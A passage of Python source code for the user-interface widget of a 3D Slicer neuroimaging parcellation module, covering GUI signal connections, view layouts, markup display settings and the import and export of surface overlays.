self.ui.inputCurvesCollapsibleButton.layout().addWidget(self.inputCurvesWidget)\n\n self.inputPlanesWidget = NeuroSegmentInputMarkupsFrame(self.logic, \"vtkMRMLMarkupsPlaneNode\")\n self.ui.inputPlanesCollapsibleButton.layout().addWidget(self.inputPlanesWidget)\n\n self.setParameterNode(self.logic.getParameterNode())\n\n # Connections\n self.ui.parameterNodeSelector.connect('currentNodeChanged(vtkMRMLNode*)', self.setParameterNode)\n self.ui.parameterNodeSelector.connect('nodeAdded(vtkMRMLNode*)', self.onParameterNodeAdded)\n self.ui.loadQueryButton.connect('clicked(bool)', self.onLoadQuery)\n self.ui.applyButton.connect('clicked(bool)', self.onApplyButton)\n self.ui.exportButton.connect('clicked(bool)', self.onExportButton)\n self.ui.exportLabelButton.connect('clicked(bool)', self.onExportLabelButton)\n\n self.ui.markupRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n self.ui.overlayRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n self.ui.singleOverlayRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n self.ui.multipleOverlayRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n\n self.ui.importMarkupComboBox.connect('currentNodeChanged(vtkMRMLNode*)', self.updateImportWidget)\n self.ui.destinationMarkupComboBox.connect('currentNodeChanged(vtkMRMLNode*)', self.updateImportWidget)\n self.ui.destinationMarkupComboBox.addAttribute(\"vtkMRMLMarkupsNode\", self.logic.NODE_TYPE_ATTRIBUTE_NAME, self.logic.ORIG_NODE_ATTRIBUTE_VALUE)\n self.ui.importOverlayComboBox.connect('currentIndexChanged(int)', self.updateImportWidget)\n self.ui.destinationModelComboBox.connect('currentNodeChanged(vtkMRMLNode*)', self.updateImportWidget)\n self.ui.destinationModelComboBox.addAttribute(\"vtkMRMLModelNode\", self.logic.NEUROSEGMENT_OUTPUT_ATTRIBUTE_VALUE, str(True))\n self.ui.importButton.connect('clicked()', self.onImportButton)\n\n # These connections ensure that whenever user changes some settings on the GUI, that is saved in the MRML scene\n # (in the selected parameter node).\n self.ui.origModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n self.ui.pialModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n self.ui.inflatedModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n self.ui.exportSegmentationSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n\n self.ui.curvRadioButton.connect(\"toggled(bool)\", self.updateScalarOverlay)\n self.ui.sulcRadioButton.connect(\"toggled(bool)\", self.updateScalarOverlay)\n self.ui.labelsRadioButton.connect(\"toggled(bool)\", self.updateScalarOverlay)\n\n slicer.app.layoutManager().connect(\"layoutChanged(int)\", self.onLayoutChanged)\n self.ui.parcellationViewLayoutButton.connect(\"clicked()\", self.onParcellationViewLayoutButtonClicked)\n\n self.ui.planeIntersectionCheckBox.connect(\"toggled(bool)\", self.onPlaneCheckBox)\n\n self.ui.labelOutlineCheckBox.connect(\"toggled(bool)\", self.onLabelOutlineCheckBox)\n\n self.ui.origMarkupsCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.pialMarkupsCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.inflatedMarkupsCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.lineViewRedCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.lineViewGreenCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.lineViewYellowCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.intersectionViewRedCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.intersectionViewGreenCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.intersectionViewYellowCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.intersectionGlyphComboBox.connect(\"currentIndexChanged(int)\", self.updateMarkupDisplay)\n self.ui.curveIntersectionScaleSlider.connect(\"valueChanged(double)\", self.updateMarkupDisplay)\n\n self.ui.controlPointVisibilityCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.labelVisibilityCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.oldLayout = slicer.app.layoutManager().layout\n\n # Set path to query file\n self.ui.queryFilePathEdit.currentPath = self.logic.getQueryNodeFileName()\n\n # Initial GUI update\n self.updateGUIFromParameterNode()\n self.updateOutputStructures()\n self.onLayoutChanged()\n self.updateImportWidget()\n\n def enter(self):\n parcellationViewLayoutOpen = slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID\n self.ui.parcellationViewLayoutButton.setChecked(parcellationViewLayoutOpen)\n self.logic.updateModelNodes()\n\n def onParcellationViewLayoutButtonClicked(self):\n if self.ui.parcellationViewLayoutButton.checked:\n self.openParcellationlayout()\n else:\n self.closeParcellationLayout()\n parcellationViewLayoutOpen = slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID\n self.ui.parcellationViewLayoutButton.setChecked(parcellationViewLayoutOpen)\n\n def openParcellationlayout(self):\n if slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID:\n return\n self.oldLayout = slicer.app.layoutManager().layout\n slicer.app.layoutManager().setLayout(NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID)\n slicer.util.getNode(\"ViewO\").LinkedControlOn()\n\n def closeParcellationLayout(self):\n if slicer.app.layoutManager().layout != NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID:\n return\n\n if self.oldLayout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID:\n self.oldLayout = slicer.vtkMRMLLayoutNode.SlicerLayoutFourUpView\n slicer.app.layoutManager().setLayout(self.oldLayout)\n\n def onLayoutChanged(self):\n viewNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLViewNodeI\")\n if viewNode:\n self.addInteractorObservers(viewNode)\n viewNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLViewNodeO\")\n if viewNode:\n self.addInteractorObservers(viewNode)\n viewNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLViewNodeP\")\n if viewNode:\n self.addInteractorObservers(viewNode)\n parcellationViewLayoutOpen = slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID\n self.ui.parcellationViewLayoutButton.setChecked(parcellationViewLayoutOpen)\n\n def addInteractorObservers(self, viewNode):\n if viewNode is None:\n return\n\n layoutManager = slicer.app.layoutManager()\n view = layoutManager.threeDWidget(viewNode.GetName()).threeDView()\n interactor = view.interactor()\n if not self.hasObserver(interactor, vtk.vtkCommand.MouseMoveEvent, self.onMouseMoveIn3DView):\n self.addObserver(interactor, vtk.vtkCommand.MouseMoveEvent, self.onMouseMoveIn3DView)\n\n interactionNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLInteractionNodeSingleton\")\n if not self.hasObserver(interactionNode, slicer.vtkMRMLInteractionNode.InteractionModeChangedEvent, self.onInteractionModeChanged):\n self.addObserver(interactionNode, slicer.vtkMRMLInteractionNode.InteractionModeChangedEvent, self.onInteractionModeChanged)\n\n def onInteractionModeChanged(self, interactionNode, event=None):\n if interactionNode is None:\n return\n\n selectionNode = slicer.app.applicationLogic().GetSelectionNode()\n if selectionNode is None:\n return\n\n currentPlaceNode = slicer.mrmlScene.GetNodeByID(selectionNode.GetActivePlaceNodeID())\n nodeType = currentPlaceNode.GetAttribute(self.logic.NODE_TYPE_ATTRIBUTE_NAME)\n if nodeType is None:\n return\n\n if currentPlaceNode.IsA(\"vtkMRMLMarkupsCurveNode\") and nodeType == self.logic.ORIG_NODE_ATTRIBUTE_VALUE:\n self.logic.onMasterMarkupModified(currentPlaceNode)\n elif nodeType == self.logic.PIAL_NODE_ATTRIBUTE_VALUE or nodeType == self.logic.INFLATED_NODE_ATTRIBUTE_VALUE:\n self.logic.onDerivedControlPointsModified(currentPlaceNode)\n\n def onMouseMoveIn3DView(self, caller, event=None):\n if caller is None:\n return\n\n interactionNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLInteractionNodeSingleton\")\n if interactionNode is None or interactionNode.GetCurrentInteractionMode() != interactionNode.Place:\n return\n\n selectionNode = slicer.app.applicationLogic().GetSelectionNode()\n\n viewNode = None\n layoutManager = slicer.app.layoutManager()\n for i in range(layoutManager.threeDViewCount):\n viewWidget = layoutManager.threeDWidget(i)\n view = viewWidget.threeDView()\n interactor = view.interactor()\n if not interactor is caller:\n continue\n viewNode = viewWidget.mrmlViewNode()\n\n nodeName = \"\"\n if viewNode:\n nodeName = viewNode.GetName()\n\n currentPlaceNode = slicer.mrmlScene.GetNodeByID(selectionNode.GetActivePlaceNodeID())\n nodeType = currentPlaceNode.GetAttribute(self.logic.NODE_TYPE_ATTRIBUTE_NAME)\n if nodeType is None:\n return\n\n origNode = None\n pialNode = None\n inflatedNode = None\n if nodeType == self.logic.ORIG_NODE_ATTRIBUTE_VALUE:\n origNode = currentPlaceNode\n pialNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE)\n inflatedNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE)\n elif nodeType == self.logic.PIAL_NODE_ATTRIBUTE_VALUE:\n origNode = currentPlaceNode.GetNodeReference(\"OrigMarkup\")\n pialNode = currentPlaceNode\n inflatedNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE)\n elif nodeType == self.logic.INFLATED_NODE_ATTRIBUTE_VALUE:\n origNode = currentPlaceNode.GetNodeReference(\"OrigMarkup\")\n pialNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE)\n inflatedNode = currentPlaceNode\n\n if (nodeName == \"ViewI\" and nodeType == self.logic.INFLATED_NODE_ATTRIBUTE_VALUE or\n nodeName == \"ViewP\" and nodeType == self.logic.PIAL_NODE_ATTRIBUTE_VALUE or\n nodeName == \"ViewO\" and nodeType == self.logic.ORIG_NODE_ATTRIBUTE_VALUE):\n return\n\n interactionNode.SetCurrentInteractionMode(interactionNode.Select)\n interactionNode.SetPlaceModePersistence(True)\n if nodeName == \"ViewI\":\n selectionNode.SetActivePlaceNodeID(inflatedNode.GetID())\n selectionNode.SetActivePlaceNodeClassName(inflatedNode.GetClassName())\n elif nodeName == \"ViewP\":\n selectionNode.SetActivePlaceNodeID(pialNode.GetID())\n selectionNode.SetActivePlaceNodeClassName(pialNode.GetClassName())\n else:\n selectionNode.SetActivePlaceNodeID(origNode.GetID())\n selectionNode.SetActivePlaceNodeClassName(origNode.GetClassName())\n interactionNode.SetCurrentInteractionMode(interactionNode.Place)\n\n def cleanup(self):\n \"\"\"\n Called when the application closes and the module widget is destroyed.\n \"\"\"\n self.logic.removeObservers()\n self.removeObservers()\n slicer.app.layoutManager().disconnect(\"layoutChanged(int)\", self.onLayoutChanged)\n\n def setParameterNode(self, inputParameterNode):\n \"\"\"\n Adds observers to the selected parameter node. Observation is needed because when the\n parameter node is changed then the GUI must be updated immediately.\n \"\"\"\n # Set parameter node in the parameter node selector widget\n wasBlocked = self.ui.parameterNodeSelector.blockSignals(True)\n self.ui.parameterNodeSelector.setCurrentNode(inputParameterNode)\n self.ui.parameterNodeSelector.blockSignals(wasBlocked)\n\n if inputParameterNode == self.parameterNode:\n # No change\n return\n\n self.parameterNode = inputParameterNode\n\n try:\n slicer.app.pauseRender()\n\n # Remove observers on previously selected parameter node and add an observer to the newly selected.\n # Changes of parameter node are observed so that whenever parameters are changed by a script or any other module\n # those are reflected immediately in the GUI.\n self.removeObservers(self.onParameterNodeModified)\n if self.parameterNode is not None:\n self.addObserver(self.parameterNode, vtk.vtkCommand.ModifiedEvent, self.onParameterNodeModified)\n self.onParameterNodeModified(self.parameterNode)\n\n self.inputCurvesWidget.setParameterNode(inputParameterNode)\n self.inputPlanesWidget.setParameterNode(inputParameterNode)\n\n # Initial GUI update\n self.logic.setParameterNode(self.parameterNode)\n self.updateGUIFromParameterNode()\n\n finally:\n slicer.app.resumeRender()\n\n def onEndImportEvent(self, caller=None, event=None):\n self.onParameterNodeModified()\n\n @vtk.calldata_type(vtk.VTK_OBJECT)\n def onParameterNodeModified(self, caller=None, event=None, callData=None):\n if slicer.mrmlScene.IsImporting():\n return\n\n self.removeObservers(self.onOrigModelNodeModified)\n origModelNode = self.logic.getOrigModelNode(self.parameterNode)\n if origModelNode:\n self.addObserver(origModelNode, vtk.vtkCommand.ModifiedEvent, self.onOrigModelNodeModified)\n self.updateGUIFromParameterNode()\n\n @vtk.calldata_type(vtk.VTK_OBJECT)\n def onOrigModelNodeModified(self, caller=None, event=None, callData=None):\n if slicer.mrmlScene.IsImporting():\n return\n self.updateImportWidget()\n\n def updateGUIFromParameterNode(self, caller=None, event=None):\n \"\"\"\n This method is called whenever parameter node is changed.\n The module GUI is updated to show the current state of the parameter node.\n \"\"\"\n # Disable all sections if no parameter node is selected\n self.ui.inputPlanesCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.inputCurvesCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.inputModelCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.outputModelsCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.exportSegmentationCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.applyButton.enabled = self.parameterNode is not None\n\n if self.outputModelsWidget is not None:\n self.outputModelsWidget.deleteLater()\n self.outputModelsWidget = None\n\n if self.parameterNode is None:\n return\n\n # Display parameters\n scalarOverlay = self.logic.getScalarOverlay(self.parameterNode)\n wasBlocked = self.ui.curvRadioButton.blockSignals(True)\n self.ui.curvRadioButton.checked = scalarOverlay == \"curv\"\n self.ui.curvRadioButton.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.sulcRadioButton.blockSignals(True)\n self.ui.sulcRadioButton.checked = scalarOverlay == \"sulc\"\n self.ui.sulcRadioButton.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.labelsRadioButton.blockSignals(True)\n self.ui.labelsRadioButton.checked = scalarOverlay == \"labels\"\n self.ui.labelsRadioButton.blockSignals(wasBlocked)\n \n wasBlocked = self.ui.origMarkupsCheckBox.blockSignals(True)\n self.ui.origMarkupsCheckBox.setChecked(self.logic.getMarkupSliceViewVisibility(self.parameterNode, self.logic.ORIG_NODE_ATTRIBUTE_VALUE))\n self.ui.origMarkupsCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.pialMarkupsCheckBox.blockSignals(True)\n self.ui.pialMarkupsCheckBox.setChecked(self.logic.getMarkupSliceViewVisibility(self.parameterNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE))\n self.ui.pialMarkupsCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.inflatedMarkupsCheckBox.blockSignals(True)\n self.ui.inflatedMarkupsCheckBox.setChecked(self.logic.getMarkupSliceViewVisibility(self.parameterNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE))\n self.ui.inflatedMarkupsCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.planeIntersectionCheckBox.blockSignals(True)\n self.ui.planeIntersectionCheckBox.setChecked(self.logic.getPlaneIntersectionVisible())\n self.ui.planeIntersectionCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.labelOutlineCheckBox.blockSignals(True)\n self.ui.labelOutlineCheckBox.setChecked(self.logic.getLabelOutlineVisible())\n self.ui.labelOutlineCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.lineViewRedCheckBox.blockSignals(True)\n self.ui.lineViewRedCheckBox.setChecked(self.logic.getRedLineVisibility())\n self.ui.lineViewRedCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.lineViewGreenCheckBox.blockSignals(True)\n self.ui.lineViewGreenCheckBox.setChecked(self.logic.getGreenLineVisibility())\n self.ui.lineViewGreenCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.lineViewYellowCheckBox.blockSignals(True)\n self.ui.lineViewYellowCheckBox.setChecked(self.logic.getYellowLineVisibility())\n self.ui.lineViewYellowCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionViewRedCheckBox.blockSignals(True)\n self.ui.intersectionViewRedCheckBox.setChecked(self.logic.getRedIntersectionVisibility())\n self.ui.intersectionViewRedCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionViewGreenCheckBox.blockSignals(True)\n self.ui.intersectionViewGreenCheckBox.setChecked(self.logic.getGreenIntersectionVisibility())\n self.ui.intersectionViewGreenCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionViewYellowCheckBox.blockSignals(True)\n self.ui.intersectionViewYellowCheckBox.setChecked(self.logic.getYellowIntersectionVisibility())\n self.ui.intersectionViewYellowCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionGlyphComboBox.blockSignals(True)\n index = self.ui.intersectionGlyphComboBox.findData(self.logic.getIntersectionGlyphType())\n self.ui.intersectionGlyphComboBox.currentIndex = index\n self.ui.intersectionGlyphComboBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.curveIntersectionScaleSlider.blockSignals(True)\n self.ui.curveIntersectionScaleSlider.value = self.logic.getIntersectionGlyphScale()\n self.ui.curveIntersectionScaleSlider.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.controlPointVisibilityCheckBox.blockSignals(True)\n self.ui.controlPointVisibilityCheckBox.setChecked(self.logic.getControlPointVisibility())\n self.ui.controlPointVisibilityCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.labelVisibilityCheckBox.blockSignals(True)\n self.ui.labelVisibilityCheckBox.setChecked(self.logic.getLabelVisibility())\n self.ui.labelVisibilityCheckBox.blockSignals(wasBlocked)\n\n # Update each widget from parameter node\n # Need to temporarily block signals to prevent infinite recursion (MRML node update triggers\n # GUI update, which triggers MRML node update, which triggers GUI update, ...)\n\n wasBlocked = self.ui.origModelSelector.blockSignals(True)\n self.ui.origModelSelector.setCurrentNode(self.logic.getOrigModelNode(self.parameterNode))\n self.ui.origModelSelector.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.pialModelSelector.blockSignals(True)\n self.ui.pialModelSelector.setCurrentNode(self.logic.getPialModelNode(self.parameterNode))\n self.ui.pialModelSelector.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.inflatedModelSelector.blockSignals(True)\n self.ui.inflatedModelSelector.setCurrentNode(self.logic.getInflatedModelNode(self.parameterNode))\n self.ui.inflatedModelSelector.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.exportSegmentationSelector.blockSignals(True)\n self.ui.exportSegmentationSelector.setCurrentNode(self.logic.getExportSegmentation())\n self.ui.exportSegmentationSelector.blockSignals(wasBlocked)\n\n # Update buttons states and tooltips\n if (self.logic.getNumberOfOutputModels() > 0 and self.logic.getExportSegmentation() and\n self.logic.getOrigModelNode(self.parameterNode) and self.logic.getPialModelNode(self.parameterNode)):\n self.ui.exportButton.enabled = True\n else:\n self.ui.exportButton.enabled = False\n\n outputModelsLayout = qt.QFormLayout()\n outputModelsLayout.verticalSpacing = 6\n\n self.outputModelsWidget = qt.QWidget()\n self.outputModelsWidget.setLayout(outputModelsLayout)\n self.ui.outputModelsCollapsibleButton.layout().addWidget(self.outputModelsWidget)\n\n for toolNode in self.logic.getToolNodes():\n outputModelNode = toolNode.GetNodeReference(\"BoundaryCut.OutputModel\")\n outputModelName = \"ERR\"\n if outputModelNode:\n outputModelName = outputModelNode.GetName()\n label = qt.QLabel(outputModelName + \":\")\n outputModelWidget = NeuroSegmentOutputToolWidget(self.logic)\n outputModelsLayout.addRow(label, outputModelWidget)\n outputModelWidget.setToolNode(toolNode)\n outputModelWidget.setParameterNode(self.parameterNode)\n\n self.updateOutputStructures()\n self.updateImportWidget()\n\n def createInputMarkupsWidget(self, markupNodeClass):\n markupsLayout = qt.QFormLayout()\n for inputNode in self.logic.getInputMarkupNodes():\n\n if inputNode.IsA(markupNodeClass):\n markupWidget = NeuroSegmentInputMarkupsWidget()\n markupWidget.setInputMarkupsNode(inputNode)\n markupsLayout.addRow(qt.QLabel(inputNode.GetName() + \":\"), markupWidget)\n\n markupsWidget = qt.QWidget()\n markupsWidget.setLayout(markupsLayout)\n return markupsWidget\n\n def updateParameterNodeFromGUI(self, caller=None, event=None):\n \"\"\"\n This method is called when the user makes any change in the GUI.\n The changes are saved into the parameter node (so that they are restored when the scene is saved and loaded).\n \"\"\"\n if self.parameterNode is None:\n return\n\n with slicer.util.NodeModify(self.parameterNode):\n self.logic.setOrigModelNode(self.parameterNode, self.ui.origModelSelector.currentNode())\n self.logic.setPialModelNode(self.parameterNode, self.ui.pialModelSelector.currentNode())\n self.logic.setInflatedModelNode(self.parameterNode, self.ui.inflatedModelSelector.currentNode())\n self.logic.setExportSegmentation(self.ui.exportSegmentationSelector.currentNode())\n\n def updateScalarOverlay(self):\n scalarName = \"curv\"\n if self.ui.curvRadioButton.isChecked():\n scalarName = \"curv\"\n elif self.ui.sulcRadioButton.isChecked():\n scalarName = \"sulc\"\n elif self.ui.labelsRadioButton.isChecked():\n scalarName = \"labels\"\n self.logic.setScalarOverlay(self.parameterNode, scalarName)\n\n def updateMarkupDisplay(self):\n \"\"\"\n Update the visibility of markups in each view based on the slice visibility checkboxes\n \"\"\"\n if self.parameterNode is None:\n return\n\n with slicer.util.NodeModify(self.parameterNode):\n self.logic.setMarkupSliceViewVisibility(self.parameterNode, self.logic.ORIG_NODE_ATTRIBUTE_VALUE, self.ui.origMarkupsCheckBox.checked)\n self.logic.setMarkupSliceViewVisibility(self.parameterNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE, self.ui.pialMarkupsCheckBox.checked)\n self.logic.setMarkupSliceViewVisibility(self.parameterNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE, self.ui.inflatedMarkupsCheckBox.checked)\n\n self.logic.setIntersectionGlyphType(self.ui.intersectionGlyphComboBox.currentData)\n self.logic.setIntersectionGlyphScale(self.ui.curveIntersectionScaleSlider.value)\n\n self.logic.setRedLineVisibility(self.ui.lineViewRedCheckBox.checked)\n self.logic.setGreenLineVisibility(self.ui.lineViewGreenCheckBox.checked)\n self.logic.setYellowLineVisibility(self.ui.lineViewYellowCheckBox.checked)\n\n self.logic.setRedIntersectionVisibility(self.ui.intersectionViewRedCheckBox.checked)\n self.logic.setGreenIntersectionVisibility(self.ui.intersectionViewGreenCheckBox.checked)\n self.logic.setYellowIntersectionVisibility(self.ui.intersectionViewYellowCheckBox.checked)\n\n self.logic.setControlPointVisibility(self.ui.controlPointVisibilityCheckBox.checked)\n\n self.logic.setLabelVisibility(self.ui.labelVisibilityCheckBox.checked)\n\n def onApplyButton(self):\n \"\"\"\n Apply all of the parcellation tools\n \"\"\"\n if self.parameterNode is None:\n logging.error(\"onApplyButton: Invalid parameter node\")\n return\n\n self.logic.initializePedigreeIds(self.parameterNode)\n\n for toolNode in self.logic.getToolNodes():\n self.logic.runDynamicModelerTool(toolNode)\n self.logic.exportOutputToSurfaceLabel(self.parameterNode)\n\n def onExportButton(self):\n \"\"\"\n Export the mesh connecting the inner and outer surfaces when the export button is clicked\n \"\"\"\n surfacesToExport = []\n checkedIndexes = self.ui.structureSelector.checkedIndexes()\n for index in checkedIndexes:\n surfacesToExport.append(self.ui.structureSelector.itemText(index.row()))\n\n try:\n self.logic.exportOutputToSegmentation(self.parameterNode, surfacesToExport)\n except Exception as e:\n slicer.util.errorDisplay(\"Failed to compute results: \"+str(e))\n import traceback\n traceback.print_exc()\n\n def onExportLabelButton(self):\n surfacesToExport = []\n checkedIndexes = self.ui.structureSelector.checkedIndexes()\n for index in checkedIndexes:\n surfacesToExport.append(self.ui.structureSelector.itemText(index.row()))\n\n self.logic.exportOutputToSurfaceLabel(self.parameterNode, surfacesToExport)\n\n def onParameterNodeAdded(self, parameterNode):\n \"\"\"\n Called if a node is added from the combobox.\n Sets the default node parameters.\n \"\"\"\n self.logic.setDefaultParameters(parameterNode)\n\n def onLoadQuery(self):\n \"\"\"\n Load the query information from file.\n If an error occurs, change the query button icon and display an error message.\n \"\"\"\n if self.parameterNode is None:\n return\n\n self.ui.loadQueryButton.setIcon(qt.QIcon())\n self.ui.loadQueryButton.setToolTip(\"\")\n\n currentPath = self.ui.queryFilePathEdit.currentPath\n\n success, message = self.logic.loadQuery(currentPath)\n if not success:\n icon = self.ui.loadQueryButton.style().standardIcon(qt.QStyle.SP_MessageBoxCritical)\n self.ui.loadQueryButton.setIcon(icon)\n self.ui.loadQueryButton.setToolTip(message)\n\n def updateOutputStructures(self):\n \"\"\"\n Update the contents of the structure selector.\n Ensure that the same structures are selected before and after update if possible.\n \"\"\"\n checkedItems = []\n checkedIndexes = self.ui.structureSelector.checkedIndexes()\n for index in checkedIndexes:\n checkedItems.append(self.ui.structureSelector.itemText(index.row()))\n\n self.ui.structureSelector.clear()\n for outputModel in self.logic.getOutputModelNodes():\n self.ui.structureSelector.addItem(outputModel.GetName())\n if outputModel.GetName() in checkedItems:\n row = self.ui.structureSelector.findText(outputModel.GetName())\n index = self.ui.structureSelector.model().index(row, 0)\n self.ui.structureSelector.setCheckState(index, qt.Qt.Checked)\n\n def updateImportWidget(self):\n \"\"\"\n Update the appearance of the import/export widget.\n This enables/disables the import button depending on the validity of the input, and shows/hides/populates the\n comboboxes for the input/output nodes and overlays.\n \"\"\"\n\n self.ui.importMarkupComboBox.setVisible(self.ui.markupRadioButton.isChecked())\n self.ui.destinationMarkupComboBox.setVisible(self.ui.markupRadioButton.isChecked())\n self.ui.importOverlayComboBox.setVisible(self.ui.overlayRadioButton.isChecked())\n self.ui.destinationModelComboBox.setVisible(self.ui.overlayRadioButton.isChecked())\n self.ui.destinationModelComboBox.setEnabled(self.ui.singleOverlayRadioButton.isChecked())\n\n self.ui.singleOverlayRadioButton.setVisible(self.ui.overlayRadioButton.isChecked())\n self.ui.multipleOverlayRadioButton.setVisible(self.ui.overlayRadioButton.isChecked())\n\n wasBlocking = self.ui.importOverlayComboBox.blockSignals(True)\n currentOverlayText = self.ui.importOverlayComboBox.currentText\n self.ui.importOverlayComboBox.clear()\n origModelNode = self.logic.getOrigModelNode(self.parameterNode)\n if origModelNode:\n overlays = self.logic.getPointScalarOverlays(origModelNode)\n for overlay in overlays:\n overlayName = overlay.GetName()\n self.ui.importOverlayComboBox.addItem(overlayName)\n currentOverlayIndex = self.ui.importOverlayComboBox.findText(currentOverlayText)\n self.ui.importOverlayComboBox.currentIndex = currentOverlayIndex\n self.ui.importOverlayComboBox.blockSignals(wasBlocking)\n\n importEnabled = False\n if self.ui.markupRadioButton.isChecked():\n importNode = self.ui.importMarkupComboBox.currentNode()\n destinationNode = self.ui.destinationMarkupComboBox.currentNode()\n importEnabled = not importNode is None and not destinationNode is None and importNode != destinationNode\n\n elif self.ui.overlayRadioButton.isChecked():\n importOverlay = self.ui.importOverlayComboBox.currentText\n destinationNode = self.ui.destinationModelComboBox.currentNode()\n importEnabled = importOverlay != \"\"\n if destinationNode is None and self.ui.singleOverlayRadioButton.isChecked():\n importEnabled = False\n\n self.ui.importButton.enabled = importEnabled\n\n def onImportButton(self):\n if self.ui.markupRadioButton.isChecked():\n self.importMarkupNode()\n elif self.ui.overlayRadioButton.isChecked():\n if self.ui.singleOverlayRadioButton.isChecked():\n self.importOverlay()\n else:\n self.importMultipleStructures()\n self.updateGUIFromParameterNode()\n\n def importMultipleStructures(self):\n\n origModelNode = self.logic.getOrigModelNode(self.parameterNode)\n importOverlay = self.ui.importOverlayComboBox.currentText\n\n originalScalarName = None\n displayNode = origModelNode.GetDisplayNode()\n if displayNode:\n originalScalarName = displayNode.GetActiveScalarName()\n\n # In order to populate the overlay correctly, we need to change the color table to match the label\n self.logic.setScalarOverlay(self.parameterNode, importOverlay)\n\n colorTableNode = origModelNode.GetDisplayNode().GetColorNode()\n\n layout = qt.QFormLayout()\n comboBoxes = []\n\n outputModelNodes = self.logic.getOutputModelNodes()\n outputModelNames = []\n outputModelIds = []\n for outputModelNode in outputModelNodes:\n outputModelNames.append(outputModelNode.GetName())\n outputModelIds.append(outputModelNode.GetID())\n\n for i in range(colorTableNode.GetNumberOfColors()):\n colorName = colorTableNode.GetColorName(i)\n color = [0,0,0,0]\n colorTableNode.GetColor(i, color)\n\n destinationComboBox = qt.QComboBox()\n destinationComboBox.setSizePolicy(qt.QSizePolicy.Expanding, qt.QSizePolicy.Fixed)\n destinationComboBox.addItem(str(None), None)\n for i in range(len(outputModelNodes)):\n destinationComboBox.addItem(outputModelNames[i], outputModelIds[i])\n\n for i in range(len(color)):\n color[i] = int(255 * color[i])\n\n label = qt.QLabel()\n colorString = \"rgb({0}, {1}, {2})\".format(color[0], color[1], color[2])\n label.setStyleSheet(\"QLabel { background-color: \" + colorString + \"}\")\n label.setMinimumSize(24, 24)\n\n rowWidget = qt.QWidget()\n rowWidget.setLayout(qt.QHBoxLayout())\n rowWidget.layout().setContentsMargins(0,0,0,0)\n rowWidget.layout().addWidget(label)\n rowWidget.layout().addWidget(destinationComboBox)\n layout.addRow(qt.QLabel(colorName), rowWidget)\n comboBoxes.append(destinationComboBox)\n\n widget = qt.QWidget()\n widget.setLayout(layout)\n\n scrollArea = qt.QScrollArea()\n 